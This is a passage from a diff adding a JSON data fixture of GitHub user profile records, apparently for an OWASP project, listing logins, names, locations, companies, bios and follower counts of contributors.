"is_hireable": false, + "twitter_username": "FairywrenTech" + } +}, +{ + "model": "github.user", + "pk": 189, + "fields": { + "nest_created_at": "2024-09-11T20:17:10.680Z", + "nest_updated_at": "2024-09-11T20:17:10.680Z", + "name": "dragoon", + "login": "draunger", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/145993709?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2023-09-25T12:45:19Z", + "updated_at": "2024-06-21T17:17:20Z", + "node_id": "U_kgDOCLOv7Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 190, + "fields": { + "nest_created_at": "2024-09-11T20:17:11.945Z", + "nest_updated_at": "2024-09-22T20:31:20.086Z", + "name": "Rick M", + "login": "kingthorin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7570458?v=4", + "company": "", + "location": "Ontario, Canada", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 319, + "public_gists_count": 2, + "public_repositories_count": 118, + "created_at": "2014-05-13T14:38:30Z", + "updated_at": "2024-09-06T17:27:34Z", + "node_id": "MDQ6VXNlcjc1NzA0NTg=", + "bio": "IT Sec guy, @zaproxy co-lead, @OWASP WSTG co-lead, @OWASP VWAD co-lead, Hac≺3r, supporter of oxford commas, #INTJ.", + "is_hireable": false, + "twitter_username": "kingthorin_rm" + } +}, +{ + "model": "github.user", + "pk": 191, + "fields": { + "nest_created_at": "2024-09-11T20:17:12.376Z", + "nest_updated_at": "2024-09-11T20:17:12.376Z", + "name": "Rudrani Angira", + "login": "rangira", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15335730?v=4", + "company": "Indiana University", + "location": "Bloomington, Indiana", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2015-10-27T03:18:48Z", + "updated_at": "2024-08-05T22:40:16Z", + "node_id": "MDQ6VXNlcjE1MzM1NzMw", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 192, + "fields": { + "nest_created_at": "2024-09-11T20:17:14.104Z", + "nest_updated_at": "2024-09-11T20:17:14.104Z", + "name": "Greg Lowe", + "login": "xxgreg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/704?v=4", + "company": "", + "location": "Wellington, New Zealand", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 27, + "public_gists_count": 5, + "public_repositories_count": 32, + "created_at": "2008-02-23T20:53:14Z", + "updated_at": "2024-04-29T21:56:20Z", + "node_id": "MDQ6VXNlcjcwNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 193, + "fields": { + "nest_created_at": "2024-09-11T20:17:14.950Z", + "nest_updated_at": "2024-09-22T19:28:03.228Z", + "name": "", + "login": "Marcono1234", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11685886?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 87, + "public_gists_count": 1, + "public_repositories_count": 64, + "created_at": "2015-03-27T20:17:49Z", + "updated_at": "2024-06-30T22:09:28Z", + "node_id": "MDQ6VXNlcjExNjg1ODg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 194, + "fields": { + "nest_created_at": "2024-09-11T20:17:15.805Z", + "nest_updated_at": "2024-09-22T20:21:33.911Z", + "name": "Philip Schlesinger @ Cryoport", + "login": "philCryoport", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28901899?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2017-05-23T16:08:09Z", + "updated_at": "2024-08-27T18:01:47Z", + "node_id": "MDQ6VXNlcjI4OTAxODk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 195, + "fields": { + "nest_created_at": "2024-09-11T20:17:16.675Z", + "nest_updated_at": "2024-09-11T20:17:16.675Z", + "name": "Risotto Bias", + "login": "unusualevent", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111516305?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2022-08-18T14:00:43Z", + "updated_at": "2024-09-08T09:05:50Z", + "node_id": "U_kgDOBqWakQ", + "bio": "Appsec and fediverse nerd.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 196, + "fields": { + "nest_created_at": "2024-09-11T20:17:17.504Z", + "nest_updated_at": "2024-09-22T20:24:54.501Z", + "name": "Najam Ul Saqib", + "login": "njmulsqb", + "email": "najamulsaqib@tutamail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/47940898?v=4", + "company": "Tecvity", + "location": "Pakistan", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 46, + "public_gists_count": 3, + "public_repositories_count": 43, + "created_at": "2019-02-24T10:43:10Z", + "updated_at": "2024-09-21T23:16:37Z", + "node_id": "MDQ6VXNlcjQ3OTQwODk4", + "bio": " Application Security Engineer | Software Engineer | Cyber Soldier", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 197, + "fields": { + "nest_created_at": "2024-09-11T20:17:19.582Z", + "nest_updated_at": "2024-09-11T20:17:19.582Z", + "name": "Edmond", + "login": "Devmond", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6935940?v=4", + "company": "Codesolvent", + "location": "Baltimore, MD", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2014-03-13T01:13:03Z", + "updated_at": "2024-05-19T21:54:05Z", + "node_id": "MDQ6VXNlcjY5MzU5NDA=", + "bio": "Developer/Founder of Solvent", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 198, + "fields": { + "nest_created_at": "2024-09-11T20:17:20.454Z", + "nest_updated_at": "2024-09-22T20:25:19.249Z", + "name": "Andrew van der Stock", + "login": "vanderaj", + "email": "vanderaj@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/5029993?v=4", + "company": "OWASP Foundation", + "location": "Colorado Springs, CO", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 235, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2013-07-17T09:59:43Z", + "updated_at": "2024-08-20T18:34:18Z", + "node_id": "MDQ6VXNlcjUwMjk5OTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "vanderaj" + } +}, +{ + "model": "github.user", + "pk": 199, + "fields": { + "nest_created_at": "2024-09-11T20:17:22.146Z", + "nest_updated_at": "2024-09-22T16:35:36.696Z", + "name": "Mark Robinson", + "login": "MarkSRobinson", + "email": "mrobinson@plaid.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2237823?v=4", + "company": "", + "location": "San Francisco", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 45, + "created_at": "2012-08-29T00:04:22Z", + "updated_at": "2024-09-19T03:40:51Z", + "node_id": "MDQ6VXNlcjIyMzc4MjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 200, + "fields": { + "nest_created_at": "2024-09-11T20:18:19.408Z", + "nest_updated_at": "2024-09-22T17:39:27.073Z", + "name": "Lisa ", + "login": "latf6711", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56416431?v=4", + "company": "OWASP Foundation", + "location": "Bel Air, MD", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 30, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2019-10-10T23:08:07Z", + "updated_at": "2023-01-24T14:52:19Z", + "node_id": "MDQ6VXNlcjU2NDE2NDMx", + "bio": "OWASP Foundation Staff", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 201, + "fields": { + "nest_created_at": "2024-09-11T20:18:23.716Z", + "nest_updated_at": "2024-09-11T20:18:23.716Z", + "name": "", + "login": "djv20", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121692050?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-12-30T19:26:47Z", + "updated_at": "2023-01-16T12:09:20Z", + "node_id": "U_kgDOB0Dfkg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 202, + "fields": { + "nest_created_at": "2024-09-11T20:18:25.424Z", + "nest_updated_at": "2024-09-11T20:18:25.424Z", + "name": "", + "login": "113ll3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152741572?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2023-12-02T21:24:45Z", + "updated_at": "2024-08-27T13:42:55Z", + "node_id": "U_kgDOCRqmxA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 203, + "fields": { + "nest_created_at": "2024-09-11T20:18:30.986Z", + "nest_updated_at": "2024-09-22T16:38:04.118Z", + "name": "Noir", + "login": "theowl4", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92230285?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2021-10-09T19:47:52Z", + "updated_at": "2024-02-17T13:48:50Z", + "node_id": "U_kgDOBX9SjQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 204, + "fields": { + "nest_created_at": "2024-09-11T20:18:35.204Z", + "nest_updated_at": "2024-09-22T16:38:11.164Z", + "name": "", + "login": "WilliamRoyNelson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7910938?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2014-06-17T08:49:31Z", + "updated_at": "2024-09-06T03:08:09Z", + "node_id": "MDQ6VXNlcjc5MTA5Mzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 205, + "fields": { + "nest_created_at": "2024-09-11T20:18:59.291Z", + "nest_updated_at": "2024-09-11T20:18:59.291Z", + "name": "", + "login": "its4win", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58930060?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-12-16T06:36:23Z", + "updated_at": "2024-05-02T03:59:15Z", + "node_id": "MDQ6VXNlcjU4OTMwMDYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 206, + "fields": { + "nest_created_at": "2024-09-11T20:19:00.151Z", + "nest_updated_at": "2024-09-22T16:38:37.640Z", + "name": "sbk6401", + "login": "bernie6401", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48666130?v=4", + "company": "NTU", + "location": "Taipei, Taiwan", + "collaborators_count": 0, + "following_count": 63, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2019-03-18T04:20:45Z", + "updated_at": "2024-09-01T11:56:35Z", + "node_id": "MDQ6VXNlcjQ4NjY2MTMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 207, + "fields": { + "nest_created_at": "2024-09-11T20:19:16.414Z", + "nest_updated_at": "2024-09-11T20:19:16.414Z", + "name": "Giedrius", + "login": "Radv1la", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61662018?v=4", + "company": "", + "location": "Vilnius, Lithuania", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-03-01T17:26:47Z", + "updated_at": "2024-08-23T05:03:34Z", + "node_id": "MDQ6VXNlcjYxNjYyMDE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 208, + "fields": { + "nest_created_at": "2024-09-11T20:19:18.130Z", + "nest_updated_at": "2024-09-22T19:25:18.093Z", + "name": "", + "login": "ivansimon319", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110600212?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-04T09:34:02Z", + "updated_at": "2024-07-29T00:42:29Z", + "node_id": "U_kgDOBpegFA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 209, + "fields": { + "nest_created_at": "2024-09-11T20:19:19.001Z", + "nest_updated_at": "2024-09-11T20:19:19.001Z", + "name": "", + "login": "yssfbahri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/138758418?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-06T06:47:40Z", + "updated_at": "2024-08-22T13:09:43Z", + "node_id": "U_kgDOCEVJEg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 210, + "fields": { + "nest_created_at": "2024-09-11T20:21:59.380Z", + "nest_updated_at": "2024-09-22T16:42:04.315Z", + "name": "Mohammad Shaad Shaikh", + "login": "mohammadshaad", + "email": "callshaad@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/89409389?v=4", + "company": "@dscvitc @enactusvitc @0xGizmolab @Sarvamtre", + "location": "Nashik | Chennai", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 173, + "public_gists_count": 0, + "public_repositories_count": 150, + "created_at": "2021-08-23T16:33:37Z", + "updated_at": "2024-09-02T12:30:52Z", + "node_id": "MDQ6VXNlcjg5NDA5Mzg5", + "bio": "Full Stack Developer @0xGizmolab • UX Researcher & Product Designer • Open-Source Enthusiast • Golang • AWS • Google Cloud", + "is_hireable": false, + "twitter_username": "MohammadShaadsk" + } +}, +{ + "model": "github.user", + "pk": 211, + "fields": { + "nest_created_at": "2024-09-11T20:22:27.858Z", + "nest_updated_at": "2024-09-22T20:26:23.915Z", + "name": "Paul McCann", + "login": "ismisepaul", + "email": "pol.maccana@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/912403?v=4", + "company": "@elastic ", + "location": "Dublin, Ireland", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 57, + "public_gists_count": 7, + "public_repositories_count": 25, + "created_at": "2011-07-13T09:49:37Z", + "updated_at": "2024-09-18T09:16:08Z", + "node_id": "MDQ6VXNlcjkxMjQwMw==", + "bio": "Hacker | Product Security | @OwaspShepherd", + "is_hireable": false, + "twitter_username": "ismisepaul" + } +}, +{ + "model": "github.user", + "pk": 212, + "fields": { + "nest_created_at": "2024-09-11T20:31:05.847Z", + "nest_updated_at": "2024-09-22T17:24:33.057Z", + "name": "Tiago Tavares", + "login": "0xtiago", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5169145?v=4", + "company": "", + "location": "Osasco", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 11, + "public_gists_count": 3, + "public_repositories_count": 35, + "created_at": "2013-08-05T21:05:57Z", + "updated_at": "2024-08-18T14:15:46Z", + "node_id": "MDQ6VXNlcjUxNjkxNDU=", + "bio": "Eternal student.", + "is_hireable": false, + "twitter_username": "tiagotavi" + } +}, +{ + "model": "github.user", + "pk": 213, + "fields": { + "nest_created_at": "2024-09-11T20:31:39.396Z", + "nest_updated_at": "2024-09-22T20:25:43.072Z", + "name": "", + "login": "CarlosAllendes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49660434?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2019-04-15T21:30:00Z", + "updated_at": "2024-05-26T01:09:13Z", + "node_id": "MDQ6VXNlcjQ5NjYwNDM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 214, + "fields": { + "nest_created_at": "2024-09-11T20:33:04.888Z", + "nest_updated_at": "2024-09-22T17:27:10.512Z", + "name": "Rose Pezzuti Dyer", + "login": "pzzd", + "email": "pezzutidyer@uchicago.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/5471867?v=4", + "company": "University of Chicago", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2013-09-16T17:44:11Z", + "updated_at": "2024-09-05T13:08:08Z", + "node_id": "MDQ6VXNlcjU0NzE4Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 215, + "fields": { + "nest_created_at": "2024-09-11T20:33:52.917Z", + "nest_updated_at": "2024-09-22T17:28:02.857Z", + "name": "Quinn Turner", + "login": "quinnturner", + "email": "quinn.turner@sage.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12538019?v=4", + "company": "", + "location": "Halifax, Nova Scotia", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2015-05-21T02:11:55Z", + "updated_at": "2024-09-20T16:15:59Z", + "node_id": "MDQ6VXNlcjEyNTM4MDE5", + "bio": "", + "is_hireable": true, + "twitter_username": "quinnturnertech" + } +}, +{ + "model": "github.user", + "pk": 216, + "fields": { + "nest_created_at": "2024-09-11T20:37:20.252Z", + "nest_updated_at": "2024-09-11T20:37:20.252Z", + "name": "Jarrod Overson", + "login": "jsoverson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/842798?v=4", + "company": "", + "location": "Santa Clara, CA", + "collaborators_count": 0, + "following_count": 112, + "followers_count": 501, + "public_gists_count": 28, + "public_repositories_count": 179, + "created_at": "2011-06-10T19:10:05Z", + "updated_at": "2024-08-24T12:48:41Z", + "node_id": "MDQ6VXNlcjg0Mjc5OA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 217, + "fields": { + "nest_created_at": "2024-09-11T20:37:21.083Z", + "nest_updated_at": "2024-09-22T17:31:57.737Z", + "name": "Monyer", + "login": "Monyer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1435145?v=4", + "company": "@JDArmy ", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 179, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2012-02-14T00:23:14Z", + "updated_at": "2024-07-08T09:51:41Z", + "node_id": "MDQ6VXNlcjE0MzUxNDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 218, + "fields": { + "nest_created_at": "2024-09-11T20:37:28.791Z", + "nest_updated_at": "2024-09-22T17:32:06.022Z", + "name": "Kevin Amado", + "login": "kamadorueda", + "email": "kamadorueda@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/47480384?v=4", + "company": "", + "location": "Calgary, Canada", + "collaborators_count": 0, + "following_count": 116, + "followers_count": 111, + "public_gists_count": 2, + "public_repositories_count": 31, + "created_at": "2019-02-09T15:59:56Z", + "updated_at": "2024-09-17T11:49:32Z", + "node_id": "MDQ6VXNlcjQ3NDgwMzg0", + "bio": "Creator, Leader, Generalist, Security first developer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 219, + "fields": { + "nest_created_at": "2024-09-11T20:37:54.392Z", + "nest_updated_at": "2024-09-22T19:44:06.149Z", + "name": "", + "login": "cw-owasp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58703134?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-12-09T17:58:19Z", + "updated_at": "2024-09-16T08:52:54Z", + "node_id": "MDQ6VXNlcjU4NzAzMTM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 220, + "fields": { + "nest_created_at": "2024-09-11T20:38:44.782Z", + "nest_updated_at": "2024-09-22T17:33:32.662Z", + "name": "Kamran Saifullah", + "login": "deFr0ggy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16836050?v=4", + "company": "Frog Community", + "location": "Frogs Pond!", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 58, + "public_gists_count": 1, + "public_repositories_count": 64, + "created_at": "2016-01-22T11:14:36Z", + "updated_at": "2024-08-29T12:48:56Z", + "node_id": "MDQ6VXNlcjE2ODM2MDUw", + "bio": "The Cyber Frog 🐸 ", + "is_hireable": false, + "twitter_username": "deFr0ggy" + } +}, +{ + "model": "github.user", + "pk": 221, + "fields": { + "nest_created_at": "2024-09-11T20:38:59.168Z", + "nest_updated_at": "2024-09-22T20:23:03.657Z", + "name": "Adam Shostack", + "login": "adamshostack", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1176137?v=4", + "company": "", + "location": "Seattle, WA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 144, + "public_gists_count": 2, + "public_repositories_count": 23, + "created_at": "2011-11-06T16:44:19Z", + "updated_at": "2024-09-21T13:45:45Z", + "node_id": "MDQ6VXNlcjExNzYxMzc=", + "bio": "Focused on security engineering", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 222, + "fields": { + "nest_created_at": "2024-09-11T20:38:59.578Z", + "nest_updated_at": "2024-09-22T20:23:00.483Z", + "name": "Andreas Happe", + "login": "andreashappe", + "email": "andreashappe@snikt.net", + "avatar_url": "https://avatars.githubusercontent.com/u/20667?v=4", + "company": "", + "location": "Vienna, Austria, Europe", + "collaborators_count": 0, + "following_count": 57, + "followers_count": 99, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2008-08-14T14:55:07Z", + "updated_at": "2024-09-22T19:48:05Z", + "node_id": "MDQ6VXNlcjIwNjY3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 223, + "fields": { + "nest_created_at": "2024-09-11T20:39:00.442Z", + "nest_updated_at": "2024-09-16T20:53:56.212Z", + "name": "Zbyszek Tenerowicz", + "login": "naugtur", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/509375?v=4", + "company": "", + "location": "Poland", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 277, + "public_gists_count": 25, + "public_repositories_count": 183, + "created_at": "2010-12-04T17:01:42Z", + "updated_at": "2024-09-16T09:03:22Z", + "node_id": "MDQ6VXNlcjUwOTM3NQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "naugtur" + } +}, +{ + "model": "github.user", + "pk": 224, + "fields": { + "nest_created_at": "2024-09-11T20:39:09.778Z", + "nest_updated_at": "2024-09-22T17:34:05.439Z", + "name": "Noodlefish", + "login": "Noodlefishh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49311040?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2019-04-05T12:34:57Z", + "updated_at": "2024-09-16T23:36:48Z", + "node_id": "MDQ6VXNlcjQ5MzExMDQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 225, + "fields": { + "nest_created_at": "2024-09-11T20:39:17.711Z", + "nest_updated_at": "2024-09-22T19:49:12.413Z", + "name": "", + "login": "forgedhallpass", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13679401?v=4", + "company": "@VerSprite CyberSecurity", + "location": "", + "collaborators_count": 0, + "following_count": 36, + "followers_count": 149, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2015-08-06T13:54:04Z", + "updated_at": "2024-08-16T17:56:24Z", + "node_id": "MDQ6VXNlcjEzNjc5NDAx", + "bio": "", + "is_hireable": true, + "twitter_username": "forgedhallpass" + } +}, +{ + "model": "github.user", + "pk": 226, + "fields": { + "nest_created_at": "2024-09-11T20:39:25.976Z", + "nest_updated_at": "2024-09-11T20:39:25.977Z", + "name": "Eudris Cabrera Rodriguez", + "login": "ecabrerar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2789130?v=4", + "company": "", + "location": "Dominican Republic", + "collaborators_count": 0, + "following_count": 127, + "followers_count": 99, + "public_gists_count": 1, + "public_repositories_count": 74, + "created_at": "2012-11-13T18:00:57Z", + "updated_at": "2024-08-26T22:32:23Z", + "node_id": "MDQ6VXNlcjI3ODkxMzA=", + "bio": "Software Developer - JUG Leader @JavaDominicano - Linux User - OpenSource Enthusiast - Baseball Lover and Good Dancer\r\n", + "is_hireable": true, + "twitter_username": "eudriscabrera" + } +}, +{ + "model": "github.user", + "pk": 227, + "fields": { + "nest_created_at": "2024-09-11T20:39:29.356Z", + "nest_updated_at": "2024-09-22T19:49:10.720Z", + "name": "Shishir", + "login": "Shishir53", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75470559?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-12-04T07:23:40Z", + "updated_at": "2024-09-10T10:53:10Z", + "node_id": "MDQ6VXNlcjc1NDcwNTU5", + "bio": "Full Stack Web Page Developer. \r\nWorking in .NET MVC, C#, Javascript, JQuery, My SQL Server, SQL Server, Mongo DB, HTML5, CSS3, Bootstrap 4 .", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 228, + "fields": { + "nest_created_at": "2024-09-11T20:39:38.586Z", + "nest_updated_at": "2024-09-22T17:34:37.285Z", + "name": "Anjali", + "login": "Anjali-Git-Hub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122084921?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2023-01-06T08:28:00Z", + "updated_at": "2024-07-30T08:40:03Z", + "node_id": "U_kgDOB0beOQ", + "bio": "Learning...", + "is_hireable": false, + "twitter_username": "yashika_22_" + } +}, +{ + "model": "github.user", + "pk": 229, + "fields": { + "nest_created_at": "2024-09-11T20:39:42.839Z", + "nest_updated_at": "2024-09-22T17:41:38.797Z", + "name": "Omar Santos", + "login": "santosomar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1690898?v=4", + "company": "", + "location": "United States", + "collaborators_count": 0, + "following_count": 52, + "followers_count": 1220, + "public_gists_count": 3, + "public_repositories_count": 253, + "created_at": "2012-04-29T21:58:44Z", + "updated_at": "2024-09-01T02:27:48Z", + "node_id": "MDQ6VXNlcjE2OTA4OTg=", + "bio": "Cybersecurity nerd with a passion on advanced attacks, vulnerability management, threat intelligence, and AI security research.", + "is_hireable": false, + "twitter_username": "santosomar" + } +}, +{ + "model": "github.user", + "pk": 230, + "fields": { + "nest_created_at": "2024-09-11T20:39:43.675Z", + "nest_updated_at": "2024-09-22T17:34:43.232Z", + "name": "Michaela Greiler", + "login": "mgreiler", + "email": "michaela.greiler@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/318561?v=4", + "company": "Code Review Workshops & Researcher", + "location": "Austria", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 248, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2010-06-30T08:45:49Z", + "updated_at": "2024-07-10T08:56:00Z", + "node_id": "MDQ6VXNlcjMxODU2MQ==", + "bio": "Giving code review workshops, building dev tools, independent consultant, host of Software Engineering Unlocked podcast.", + "is_hireable": true, + "twitter_username": "mgreiler" + } +}, +{ + "model": "github.user", + "pk": 231, + "fields": { + "nest_created_at": "2024-09-11T20:39:45.847Z", + "nest_updated_at": "2024-09-22T19:25:52.133Z", + "name": "Nancy Gariché", + "login": "nanzggits", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42896566?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-09-01T17:40:53Z", + "updated_at": "2024-09-03T11:58:29Z", + "node_id": "MDQ6VXNlcjQyODk2NTY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 232, + "fields": { + "nest_created_at": "2024-09-11T20:39:51.384Z", + "nest_updated_at": "2024-09-11T20:39:51.384Z", + "name": "Zak Dehlawi", + "login": "Zaxim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1308071?v=4", + "company": "Security Innovation", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2012-01-05T23:01:13Z", + "updated_at": "2024-09-05T21:24:08Z", + "node_id": "MDQ6VXNlcjEzMDgwNzE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 233, + "fields": { + "nest_created_at": "2024-09-11T20:39:53.001Z", + "nest_updated_at": 